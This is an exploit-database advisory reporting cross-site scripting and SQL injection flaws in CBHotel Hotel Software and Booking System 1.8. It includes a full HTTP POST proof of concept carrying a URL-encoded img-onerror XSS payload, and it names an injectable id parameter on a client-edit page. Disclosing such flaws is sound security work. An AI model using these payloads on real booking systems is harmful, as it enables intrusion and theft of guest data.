CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities

2013-08-22T00:00:00
ID 1337DAY-ID-21148
Type zdt
Reporter Dylan Irzi
Modified 2013-08-22T00:00:00

Description

Hotel Software and Booking System version 1.8 suffers from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.

                                        
                                            *Cross Site Scripting:*
Archivos Afectados Afectados
 
http://localhost/cbadm/reservations/index.php?ac=search
-------------------------------------------------------------------
PoC:
*Cross Site Scripting Post.*
URL: http://server/cbadm/reservations/index.php?ac=search
 
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0 AlexaToolbar/alxf-2.18
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.cbhotel.eu/cbadm/adm_main.php
Cookie: PHPSESSID=flp86mf2huj240qp6hj34ojgp3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
-------------------------------------------------------------------
s=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&button2=search&ss=ok
-------------------------------------------------------------------
*SQL Injection*
 
http://localhost/cbadm/clients/edit_client.php?id=1(SQL Injection)

#  0day.today [2018-01-02]  #